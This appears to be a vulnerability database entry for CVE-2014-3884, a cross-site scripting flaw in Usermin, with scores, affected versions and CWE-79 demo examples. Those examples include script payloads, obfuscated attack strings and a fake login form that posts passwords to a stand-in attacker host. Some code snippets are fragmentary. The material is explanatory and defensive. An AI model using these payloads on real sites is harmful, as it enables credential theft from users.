CVE-2014-3884 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Severity

43%

Complexity

86%

Confidentiality

48%

Cross-site scripting (XSS) vulnerability in Usermin before 1.600 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this might overlap CVE-2014-3924.

Cross-site scripting (XSS) vulnerability in Usermin before 1.600 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this might overlap CVE-2014-3924.

CVSS 2.0 Base Score 4.3. CVSS Attack Vector: network. CVSS Attack Complexity: medium. CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N).

Demo Examples

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This code displays a welcome message on a web page based on the HTTP GET username parameter. This example covers a Reflected XSS (Type 1) scenario.


               
echo '<div class="header"> Welcome, ' . $username . '</div>';

Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as


               
http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script>

This results in a harmless alert dialogue popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.

More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user's password to the attacker:


               
http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form></div>

If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user's browser:


               
</div></div>
</form>
<input type="submit" value="Login" />

The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):


               
+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A

The same attack string could also be obfuscated as:


               
\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script>

Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This example also displays a Reflected XSS (Type 1) scenario.

The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.


               
Employee ID: <%= eid %>

The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.


               
<p><asp:label id="EmployeeID" runat="server" /></p>

The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

This example covers a Stored XSS (Type 2) scenario.

The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.


               
Employee Name: <%= name %>
String name = rs.getString("name");

The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.


               
<p><asp:label id="EmployeeName" runat="server" /></p>

This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

The following example consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.

CreateUser.php


               
/.../

The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:

ListUsers.php


               
echo '</div>';
exit;
//Print list of users to page
echo '<div class="userNames">'.$row['fullname'].'</div>';

The attacker can set their name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79

Consider an application that provides a simplistic message board that saves messages in HTML format and appends them to a file. When a new user arrives in the room, it makes an announcement:


               
saveMessage($announceStr);//save HTML-formatted message to file; implementation details are irrelevant for this example.

An attacker may be able to perform an HTML injection (Type 2 XSS) attack by setting a cookie to a value like:


               
<script>document.alert('Hacked');</script>

The raw contents of the message file would look like:


               
<script>document.alert('Hacked');</script> has logged in.

For each person who visits the message page, their browser would execute the script, generating a pop-up window that says "Hacked". More malicious attacks are possible; see the rest of this entry.

Overview

Type

Webmin Usermin

First reported 10 years ago

2014-07-20 11:12:00

Last updated 10 years ago

2014-07-22 22:55:00

Affected Software

Webmin Usermin 0.4

0.4

Webmin Usermin 0.5

0.5

Webmin Usermin 0.6

0.6

Webmin Usermin 0.7

0.7

Webmin Usermin 0.80

0.80

Webmin Usermin 0.90

0.90

Webmin Usermin 0.910

0.910

Webmin Usermin 0.929

0.929

Webmin Usermin 0.930

0.930

Webmin Usermin 0.940

0.940

Webmin Usermin 0.950

0.950

Webmin Usermin 0.960

0.960

Webmin Usermin 0.970

0.970

Webmin Usermin 0.980

0.980

Webmin Usermin 0.990

0.990

Webmin Usermin 1.000

1.000

Webmin Usermin 1.010

1.010

Webmin Usermin 1.020

1.020

Webmin Usermin 1.030

1.030

Webmin Usermin 1.040

1.040

Webmin Usermin 1.050

1.050

Webmin Usermin 1.051

1.051

Webmin Usermin 1.060

1.060

Webmin Usermin 1.070

1.070

Webmin Usermin 1.080

1.080

Webmin Usermin 1.090

1.090

Webmin Usermin 1.100

1.100

Webmin Usermin 1.110

1.110

Webmin Usermin 1.120

1.120

Webmin Usermin 1.130

1.130

Webmin Usermin 1.140

1.140

Webmin Usermin 1.150

1.150

Webmin Usermin 1.160

1.160

Webmin Usermin 1.170

1.170

Webmin Usermin 1.180

1.180

Webmin Usermin 1.190

1.190

Webmin Usermin 1.200

1.200

Webmin Usermin 1.210

1.210

Webmin Usermin 1.220

1.220

Webmin Usermin 1.230

1.230

Webmin Usermin 1.240

1.240

Webmin Usermin 1.250

1.250

Webmin Usermin 1.260

1.260

Webmin Usermin 1.270

1.270

Webmin Usermin 1.280

1.280

Webmin Usermin 1.290

1.290

Webmin Usermin 1.300

1.300

Webmin Usermin 1.310

1.310

Webmin Usermin 1.320

1.320

Webmin Usermin 1.330

1.330

Webmin Usermin 1.340

1.340

Webmin Usermin 1.350

1.350

Webmin Usermin 1.360

1.360

Webmin Usermin 1.370

1.370

Webmin Usermin 1.380

1.380

Webmin Usermin 1.390

1.390

Webmin Usermin 1.400

1.400

Webmin Usermin 1.410

1.410

Webmin Usermin 1.420

1.420

Webmin Usermin 1.430

1.430

Webmin Usermin 1.440

1.440

Webmin Usermin 1.450

1.450

Webmin Usermin 1.460

1.460

Webmin Usermin 1.470

1.470

Webmin Usermin 1.480

1.480

Webmin Usermin 1.490

1.490

Webmin Usermin 1.500

1.500

Webmin Usermin 1.510

1.510

Webmin Usermin 1.520

1.520

Webmin Usermin 1.530

1.530

Webmin Usermin 1.540

1.540

Webmin Usermin 1.550

1.550

Webmin Usermin 1.560

1.560

Webmin Usermin 1.570

1.570

Webmin Usermin 1.580

1.580

Stay updated

ExploitPedia is constantly evolving. Sign up to receive a notification when we release additional functionality.

Get in touch

If you'd like to report a bug or have any suggestions for improvements then please do get in touch with us using this form. We will get back to you as soon as we can.